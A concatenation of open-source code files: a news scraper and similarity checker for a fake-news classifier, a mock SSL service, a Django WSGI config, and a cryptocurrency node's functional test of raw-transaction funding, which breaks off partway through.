5e8750b47cb5461d825eb619e99f713cc79bd360 | 4,162 | py | Python | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | 7 | 2020-06-16T17:38:46.000Z | 2022-02-19T12:33:34.000Z | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | null | null | null | fake_news_classifier/Dashboard/r_news_scrapper.py | keshavgbpecdelhi/FakeNews | 8c1c3a4a83a19b96867111727c5a7df0f6416389 | [
"MIT"
] | 5 | 2020-05-08T17:30:46.000Z | 2022-03-26T07:28:04.000Z | from newspaper import Article
import pandas as pd
import numpy as np
import pickle
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
import joblib
from sklearn.model_selection import train_test_split
import re
from googlesearch import search
from sklearn.metrics.pairwise import cosine_similarity
from urllib.parse import urlparse
#extractor function that gets the article body from the url
def extractor(url):
    """Fetch *url* with newspaper and return ([lowercased body text], title).

    Best-effort: download/parse failures are swallowed and whatever was
    parsed (possibly empty strings) is returned.
    """
    article = Article(url)
    try:
        article.download()
        article.parse()
    except Exception:
        # Fix: bare `except:` also trapped SystemExit/KeyboardInterrupt;
        # narrow to Exception while keeping the best-effort behaviour.
        pass
    # Title and lowercased body of the (possibly empty) parsed article.
    article_title = article.title
    article = article.text.lower()
    article = [article]
    return (article, article_title)
#function for the textbox extractor
#it doesn't need an API
def textAreaExtractor(text):
    """Normalise free-form textbox input and wrap it in a one-element list.

    Lowercases, replaces every non-alphanumeric/non-whitespace character
    with a space, and collapses a trailing blank line into a single space.
    """
    lowered = text.lower()
    no_punct = re.sub(r'[^a-zA-Z0-9\s]', ' ', lowered)
    cleaned = re.sub("(\\r|\r|\n)\\n$", " ", no_punct)
    return [cleaned]
#performs a google search using the article title
def google_search(title, url):
    """Google the article *title* and collect result URLs and their hostnames.

    Results from YouTube and from the article's own domain are skipped.
    Returns (search_urls, source_sites).
    """
    # Hostname of the original article, used to exclude self-references.
    # NOTE(review): if *url* has no hostname, urlparse returns None and the
    # `domain not in i` test below would raise TypeError — confirm callers
    # always pass absolute URLs.
    domain = urlparse(url).hostname
    search_urls = []
    source_sites = []
    # Collect hostnames and URLs from the first page of results.
    # (Removed: an unused `search_title` list and a dead commented-out
    # Article-download block.)
    for i in search(title, tld="com", num=10, start=1, stop=6):
        if "youtube" not in i and domain not in i:
            source_sites.append(urlparse(i).hostname)
            search_urls.append(i)
    return search_urls, source_sites
def similarity(url_list, article):
    """Score TF-IDF cosine similarity of *article* against each page in *url_list*.

    url_list: iterable of URLs, each fetched via extractor().
    article: one-element list containing the original article's text.
    Returns (cosineCleaned, averageScore): per-URL similarity percentages as
    plain numeric strings, and their float average over the non-zero scores.
    """
    article = article
    # Vocabulary is fitted on the original article only; candidate pages are
    # projected into that same space by transform() below.
    sim_tfv = TfidfVectorizer(stop_words ="english")
    sim_transform1 = sim_tfv.fit_transform(article)
    cosine = []
    cosineCleaned = []
    cosineAverage = 0
    count = 0
    # Score each fetched page against the original article.
    for i in url_list:
        test_article, test_title = extractor(i)
        # NOTE(review): extractor() already returns a list, so the extra wrap
        # here and the [0] index below cancel out — confirm before simplifying.
        test_article = [test_article]
        sim_transform2 = sim_tfv.transform(test_article[0])
        # cosine_similarity yields a 1x1 array; stored scaled to 0-100.
        score = cosine_similarity(sim_transform1, sim_transform2)
        cosine.append(score*100)
        print("Article " + str(count) + " similarity calculated")
        count+=1
    # Strip the numpy "[[...]]" brackets to get plain numeric strings.
    for i in cosine:
        x = str(i).replace('[','').replace(']','')
        cosineCleaned.append(x)
    # Average only non-zero scores; count is decremented for each zero score.
    for i in cosine:
        if i !=0:
            cosineAverage = cosineAverage + i
        else:
            count-=1
    # NOTE(review): if url_list is empty or every score is zero, count is 0
    # and this raises ZeroDivisionError — confirm intended behaviour.
    averageScore = cosineAverage/count
    averageScore = str(averageScore).replace('[','').replace(']','')
    averageScore = float(averageScore)
    print(averageScore)
    return cosineCleaned, averageScore
#classification function
def handlelink(article_link):
    """Classify the article at *article_link* with the persisted PAC model.

    Returns (prediction, article_title, [body text], url).
    """
    # Load the persisted vectorizer and classifier.
    # (Removed: the CountVectorizer pickle 'cv.pkl' was loaded but never used.)
    job_pac = joblib.load('Dashboard/static/models/pac.pkl')
    job_vec = joblib.load('Dashboard/static/models/tfv.pkl')
    url = (article_link)
    # Extract the article body and title from the URL.
    article, article_title = extractor(article_link)
    # Vectorize the body and predict with the Passive-Aggressive classifier.
    pred = job_pac.predict(job_vec.transform(article))
    print("Target article has been classified")
    return pred, article_title, article, url
if __name__ == "__main__":
    # Classify the target article and collect its prediction/title/body/url.
    prediction, article_title, article, url = handlelink(article_link='https://techcrunch.com/2020/03/03/smartnews-local-news-feature-now-covers-more-than-6000-u-s-cities/')
    # Fix: google_search returns exactly two values (result URLs, hostnames);
    # the original unpacked three names, which raises ValueError at runtime.
    url_list, source_sites = google_search(article_title, url)
    print(source_sites)
    # Compare the original article against each search result.
    similarity_score, avgScore = similarity(url_list, article)
| 33.837398 | 173 | 0.681643 |
9592e762e9d671c4fe1cbaa0b4c3478a87da94dc | 516 | py | Python | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | src/bxcommon/test_utils/mocks/mock_node_ssl_service.py | dolphinridercrypto/bxcommon | 8f70557c1dbff785a5dd3fcdf91176066e085c3a | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from ssl import SSLContext
from cryptography.x509 import Certificate
from mock import MagicMock
from bxutils.services.node_ssl_service import NodeSSLService
from bxutils.ssl.ssl_certificate_type import SSLCertificateType
class MockNodeSSLService(NodeSSLService):
    """Test double for NodeSSLService that skips all real SSL/certificate work."""

    def blocking_load(self) -> None:
        """No-op: the mock has nothing to load."""
        pass

    def create_ssl_context(self, cert_type: SSLCertificateType) -> SSLContext:
        """Return None: no real SSLContext is created in tests."""
        pass

    def get_certificate(self, cert_type: SSLCertificateType) -> Certificate:
        """Return a MagicMock standing in for a certificate."""
        return MagicMock()
| 25.8 | 78 | 0.77907 |
71db5ace5696452218f17504d5acdfd123ea8688 | 388 | py | Python | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | Asang/Asang/wsgi.py | A-Sang/Supermarket | 4d90e6d728d483dd79fd71f3c4b42c3ca938e36e | [
"Apache-2.0"
] | null | null | null | """
WSGI config for Asang project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before building the WSGI app
# (setdefault keeps an already-exported DJANGO_SETTINGS_MODULE intact).
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Asang.settings")
# Module-level WSGI callable discovered by servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| 22.823529 | 78 | 0.783505 |
45536d06c4ba4cc016e0cd6579a16e5761ee88c7 | 28,404 | py | Python | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 1 | 2020-04-07T10:09:00.000Z | 2020-04-07T10:09:00.000Z | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 13 | 2020-05-08T11:14:37.000Z | 2020-05-12T10:03:53.000Z | test/functional/rpc_fundrawtransaction.py | DancingAxolotl/encocoinplus | b3dcc750c48a4f4e2ffebd104e5426544fe2f6b8 | [
"MIT"
] | 22 | 2020-02-10T09:17:20.000Z | 2020-07-10T10:33:26.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
def get_unspent(listunspent, amount):
    """Return the first entry of *listunspent* whose 'amount' equals *amount*.

    Raises AssertionError if no entry matches.
    """
    match = next((entry for entry in listunspent if entry['amount'] == amount), None)
    if match is None:
        raise AssertionError('Could not find unspent with amount={}'.format(amount))
    return match
class RawTransactionsTest(BitcoinTestFramework):
    def __init__(self):
        """Configure the test: fresh chain (no cached blocks) with 4 regtest nodes."""
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 4
    def setup_network(self, split=False):
        """Start all nodes and connect them pairwise; the network is never split.

        `split` is accepted for framework compatibility but ignored.
        """
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
        # Bidirectional connections 0-1, 1-2, 0-2, 0-3 so txs/blocks relay everywhere.
        connect_nodes_bi(self.nodes,0,1)
        connect_nodes_bi(self.nodes,1,2)
        connect_nodes_bi(self.nodes,0,2)
        connect_nodes_bi(self.nodes,0,3)
        self.is_network_split=False
        self.sync_all()
def run_test(self):
print("Mining blocks...")
min_relay_tx_fee = self.nodes[0].getnetworkinfo()['relayfee']
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
# if the fee's positive delta is higher than this value tests will fail,
# neg. delta always fail the tests.
# The size of the signature of every input may be at most 2 bytes larger
# than a minimum sized signature.
# = 2 bytes * minRelayTxFeePerByte
feeTolerance = 2 * min_relay_tx_fee/1000
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(121)
self.sync_all()
watchonly_address = self.nodes[0].getnewaddress()
watchonly_pubkey = self.nodes[0].validateaddress(watchonly_address)["pubkey"]
watchonly_amount = Decimal(200)
self.nodes[3].importpubkey(watchonly_pubkey, "", True)
watchonly_txid = self.nodes[0].sendtoaddress(watchonly_address, watchonly_amount)
self.nodes[0].sendtoaddress(self.nodes[3].getnewaddress(), watchonly_amount / 10)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 5.0)
self.nodes[0].generate(1)
self.sync_all()
###############
# simple test #
###############
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enought inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.2 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0) #test if we have enough inputs
##############################
# simple test with two coins #
##############################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
################################
# simple test with two outputs #
################################
inputs = [ ]
outputs = { self.nodes[0].getnewaddress() : 2.6, self.nodes[1].getnewaddress() : 2.5 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert(len(dec_tx['vin']) > 0)
assert_equal(dec_tx['vin'][0]['scriptSig']['hex'], '')
#########################################################################
# test a fundrawtransaction with a VIN greater than the required amount #
#########################################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
#####################################################################
# test a fundrawtransaction with which will not get a change output #
#####################################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : Decimal(5.0) - fee - feeTolerance }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
for out in dec_tx['vout']:
totalOut += out['value']
assert_equal(rawtxfund['changepos'], -1)
assert_equal(fee + totalOut, utx['amount']) #compare vin total and totalout+fee
####################################################
# test a fundrawtransaction with an invalid option #
####################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
try:
self.nodes[2].fundrawtransaction(rawtx, {'foo': 'bar'})
raise AssertionError("Accepted invalid option foo")
except JSONRPCException as e:
assert("Unexpected key foo" in e.error['message'])
############################################################
# test a fundrawtransaction with an invalid change address #
############################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
try:
self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': 'foobar'})
raise AssertionError("Accepted invalid epgc address")
except JSONRPCException as e:
assert("changeAddress must be a valid epgc address" in e.error['message'])
############################################################
# test a fundrawtransaction with a provided change address #
############################################################
utx = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']} ]
outputs = { self.nodes[0].getnewaddress() : Decimal(4.0) }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
change = self.nodes[2].getnewaddress()
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 2})
except JSONRPCException as e:
assert('changePosition out of bounds' == e.error['message'])
else:
assert(False)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx, {'changeAddress': change, 'changePosition': 0})
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
out = dec_tx['vout'][0];
assert_equal(change, out['scriptPubKey']['addresses'][0])
#########################################################################
# test a fundrawtransaction with a VIN smaller than the required amount #
#########################################################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']}]
outputs = { self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
# 4-byte version + 1-byte vin count + 36-byte prevout then script_len
rawtx = rawtx[:82] + "0100" + rawtx[84:]
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for i, out in enumerate(dec_tx['vout']):
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
else:
assert_equal(i, rawtxfund['changepos'])
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
assert_equal("00", dec_tx['vin'][0]['scriptSig']['hex'])
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
###########################################
# test a fundrawtransaction with two VINs #
###########################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
utx2 = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 1)
assert_equal(len(dec_tx['vout']), 2)
matchingIns = 0
for vinOut in dec_tx['vin']:
for vinIn in inputs:
if vinIn['txid'] == vinOut['txid']:
matchingIns+=1
assert_equal(matchingIns, 2) #we now must see two vins identical to vins given as params
#########################################################
# test a fundrawtransaction with two VINs and two vOUTs #
#########################################################
utx = get_unspent(self.nodes[2].listunspent(), 1)
utx2 = get_unspent(self.nodes[2].listunspent(), 5)
inputs = [ {'txid' : utx['txid'], 'vout' : utx['vout']},{'txid' : utx2['txid'], 'vout' : utx2['vout']} ]
outputs = { self.nodes[0].getnewaddress() : 6.0, self.nodes[0].getnewaddress() : 1.0 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(utx['txid'], dec_tx['vin'][0]['txid'])
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
fee = rawtxfund['fee']
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
totalOut = 0
matchingOuts = 0
for out in dec_tx['vout']:
totalOut += out['value']
if out['scriptPubKey']['addresses'][0] in outputs:
matchingOuts+=1
assert_equal(matchingOuts, 2)
assert_equal(len(dec_tx['vout']), 3)
##############################################
# test a fundrawtransaction with invalid vin #
##############################################
listunspent = self.nodes[2].listunspent()
inputs = [ {'txid' : "1c7f966dab21119bac53213a2bc7532bff1fa844c124fd750a7d0b1332440bd1", 'vout' : 0} ] #invalid vin!
outputs = { self.nodes[0].getnewaddress() : 1.0}
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
try:
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
raise AssertionError("Spent more than available")
except JSONRPCException as e:
assert("Insufficient" in e.error['message'])
############################################################
#compare fee of a standard pubkeyhash transaction
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction with multiple outputs
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1,self.nodes[1].getnewaddress():1.2,self.nodes[1].getnewaddress():0.1,self.nodes[1].getnewaddress():1.3,self.nodes[1].getnewaddress():0.2,self.nodes[1].getnewaddress():0.3}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendmany("", outputs)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a 2of2 multisig p2sh transaction
# create 2of2 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
mSigObj = self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
#compare fee of a standard pubkeyhash transaction
# create 4of5 addr
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[1].getnewaddress()
addr3 = self.nodes[1].getnewaddress()
addr4 = self.nodes[1].getnewaddress()
addr5 = self.nodes[1].getnewaddress()
addr1Obj = self.nodes[1].validateaddress(addr1)
addr2Obj = self.nodes[1].validateaddress(addr2)
addr3Obj = self.nodes[1].validateaddress(addr3)
addr4Obj = self.nodes[1].validateaddress(addr4)
addr5Obj = self.nodes[1].validateaddress(addr5)
mSigObj = self.nodes[1].addmultisigaddress(4, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey'], addr4Obj['pubkey'], addr5Obj['pubkey']])
inputs = []
outputs = {mSigObj:1.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[0].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[0].sendtoaddress(mSigObj, 1.1)
signedFee = self.nodes[0].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance)
############################################################
############################################################
# spend a 2of2 multisig transaction over fundraw
# create 2of2 addr
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].validateaddress(addr1)
addr2Obj = self.nodes[2].validateaddress(addr2)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])
# send 1.2 BTC to msig addr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
oldBalance = self.nodes[1].getbalance()
inputs = []
outputs = {self.nodes[1].getnewaddress():1.1}
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[2].fundrawtransaction(rawTx)
signedTx = self.nodes[2].signrawtransaction(fundedTx['hex'])
txId = self.nodes[2].sendrawtransaction(signedTx['hex'])
self.sync_all()
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('1.10000000'), self.nodes[1].getbalance())
############################################################
# locked wallet test
self.nodes[1].encryptwallet("test")
self.nodes.pop(1)
stop_nodes(self.nodes)
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir)
# This test is not meant to test fee estimation and we'd like
# to be sure all txs are sent at a consistent desired feerate
for node in self.nodes:
node.settxfee(min_relay_tx_fee)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
connect_nodes_bi(self.nodes,0,3)
self.is_network_split=False
self.sync_all()
# drain the keypool
self.nodes[1].getnewaddress()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
# fund a transaction that requires a new key for the change output
# creating the key must be impossible because the wallet is locked
try:
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('Keypool ran out' in e.error['message'])
#refill the keypool
self.nodes[1].walletpassphrase("test", 100)
self.nodes[1].walletlock()
try:
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.2)
raise AssertionError("Wallet unlocked without passphrase")
except JSONRPCException as e:
assert('walletpassphrase' in e.error['message'])
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():1.1}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#now we need to unlock
self.nodes[1].walletpassphrase("test", 100)
signedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(signedTx['hex'])
self.nodes[1].generate(1)
self.sync_all()
# make sure funds are received at node1
assert_equal(oldBalance+Decimal('51.10000000'), self.nodes[0].getbalance())
###############################################
# multiple (~19) inputs tx test | Compare fee #
###############################################
#empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
#create same transaction over sendtoaddress
txId = self.nodes[1].sendmany("", outputs)
signedFee = self.nodes[1].getrawmempool(True)[txId]['fee']
#compare fee
feeDelta = Decimal(fundedTx['fee']) - Decimal(signedFee)
assert(feeDelta >= 0 and feeDelta <= feeTolerance*19) #~19 inputs
#############################################
# multiple (~19) inputs tx test | sign/send #
#############################################
#again, empty node1, send some small coins from node0 to node1
self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), self.nodes[1].getbalance(), "", "", True)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
for i in range(0,20):
self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.01)
self.nodes[0].generate(1)
self.sync_all()
#fund a tx with ~20 small inputs
oldBalance = self.nodes[0].getbalance()
inputs = []
outputs = {self.nodes[0].getnewaddress():0.15,self.nodes[0].getnewaddress():0.04}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs)
fundedTx = self.nodes[1].fundrawtransaction(rawTx)
fundedAndSignedTx = self.nodes[1].signrawtransaction(fundedTx['hex'])
txId = self.nodes[1].sendrawtransaction(fundedAndSignedTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(oldBalance+Decimal('50.19000000'), self.nodes[0].getbalance()) #0.19+block reward
#####################################################
# test fundrawtransaction with OP_RETURN and no vin #
#####################################################
rawtx = "0100000000010000000000000000066a047465737400000000"
dec_tx = self.nodes[2].decoderawtransaction(rawtx)
assert_equal(len(dec_tx['vin']), 0)
assert_equal(len(dec_tx['vout']), 1)
rawtxfund = self.nodes[2].fundrawtransaction(rawtx)
dec_tx = self.nodes[2].decoderawtransaction(rawtxfund['hex'])
assert_greater_than(len(dec_tx['vin']), 0) # at least one vin
assert_equal(len(dec_tx['vout']), 2) # one change output added
##################################################
# test a fundrawtransaction using only watchonly #
##################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount / 2}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx, {'includeWatching': True })
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
assert_equal(len(res_dec["vin"]), 1)
assert_equal(res_dec["vin"][0]["txid"], watchonly_txid)
assert("fee" in result.keys())
assert_greater_than(result["changepos"], -1)
###############################################################
# test fundrawtransaction using the entirety of watched funds #
###############################################################
inputs = []
outputs = {self.nodes[2].getnewaddress() : watchonly_amount}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
# Backward compatibility test (2nd param is includeWatching)
result = self.nodes[3].fundrawtransaction(rawtx, True)
res_dec = self.nodes[0].decoderawtransaction(result["hex"])
